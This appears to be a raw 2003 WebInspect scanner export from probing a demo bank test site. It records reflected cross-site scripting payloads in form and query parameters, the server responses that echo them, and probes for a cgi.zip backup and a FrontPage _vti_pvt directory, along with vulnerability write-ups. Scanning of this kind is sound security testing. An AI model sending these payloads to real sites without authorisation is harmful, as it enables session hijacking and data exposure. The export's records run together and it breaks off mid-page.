Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
POST /rootlogin.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 98
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=%2AHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:49 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 63
Content-Type: text/html
Cache-control: private
<html>
<body>
An error has occurred
</body>
</html>
Application Error MessageA web application error message was found. An error message indicates that WebInspect has generated an unhandled exception in your web application code. Unhandled exceptions are circumstances in which the application has recieved user input that it did not expect and doesn't know how to deal with. In many cases, an attacker can leverage the conditions that cause these errors in order to gain unauthorized access to the system.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 98
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=%2Aerror\shas\soccurred Or DB4Web\sClient\s-\sModul Not Generated\sby\sjavadocPOST /pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=>"><script>alert('XSS')</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:38:18 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 959
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was >"><script>alert('XSS')</script><br>
Page was looking for a value in parameter called cboPage<br><br>
<h2>What follows is a dump of the HTTP stuff</h2>
<b>Form Variables Passed:</b><br>cboPage= >"><script>alert('XSS')</script><br>
<b>QueryString variables passed:</b><br><pre>****** Head Data***
Client IP:199.72.29.34
Connection: Close
Host: zero.webappsecurity.com
Referer: http://zero.webappsecurity.com:80/pindex.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
****** End of Head Data*******</pre><br>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Single Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the double quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=<attack>>"><script>alert('XSS')</script></attack><script>alert\('XSS'\)<\/script>GET /banklogin.asp?err=>"><script>alert("XSS")</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:05 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4947
Content-Type: text/html
Cache-control: private
Set-Cookie: state=; path=/
Set-Cookie: userid=; path=/
Set-Cookie: username=; path=/
Set-Cookie: sessionid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER>>"><script>alert("XSS")</script><br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
Possible Bracket Double Quote Cross-Site Scripting (Double Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the single quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?err=<attack>>"><script>alert("XSS")</script></attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/login1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\("XSS"\)<\/script>GET /join.asp?name=&email=>"'><img%20src="javascript:alert('XSS')">&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:35 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4013
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible IMG-Tag Embedded Javascript Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place by embedding potentially malicious JavaScript code using an IMG tag with a specific JavaScript link as its source. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=<attack>>"'><img%20src="javascript:alert('XSS')"></attack>&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
javascript:alert\('XSS'\)">GET /cgi.zip HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
Error Exporting DataBackup File (cgi.zip)A compressed file of CGI scripts was found. This is usually due to an administrator or developer backing up all their scripts into a single backup file. This is extremely dangerous. By downloading this file, any attacker can retrieve the names and source of all the CGI scripts located on the web server.GET /<attack>cgi.zip</attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
200 |Content-Type:\stext/htmlGET /_vti_pvt/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:33 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Directory (_vti_pvt)<B>Found Directory:</B> /_vti_pvt/<BR<BR>Various versions of FrontPage Extensions create this directory with
improper permissions set. This directory often contains the
administrators.pwd file.Restrict access to important directories or files.
<BR><BR><B>Apache:</B>
<BR><A HREF="http://httpd.apache.org/docs/misc/security_tips.html">Security Tips
for Server Configuration</A>
<BR><A HREF="http://www.w3.org/Security/faq/wwwsf3.html">Protecting Confidential
Documents at Your Site</A>
<BR><A HREF="http://linux.com/security/newsitem.phtml?sid=12&aid=3667">Securing
Apache - Access Control</A>
<BR><BR>
<B>IIS:</B><BR>
<A HREF="http://www.microsoft.com/TechNet/iis/ntfssec.asp">Implementing NTFS
Standard Permissions on Your Web Site</A><BR><BR>
<B>Netscape:</B><BR>
<A HREF="http://developer.netscape.com/docs/manuals/enterprise/40/ag/esaccess.htm">Controlling
Access to Your Server</A>
<BR><BR>
<B>General:</B>
<BR><A HREF="http://www.hwg.org/lists/hwg-servers/passwords.html">Password
protecting web pages</A>
<BR><A HREF="http://www.microsoft.com/technet/security/chaptr14.asp">Web Security</A>GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
3\d\d |2\d\d |40[13] |5\d\dGET /_vti_pvt/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:33 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
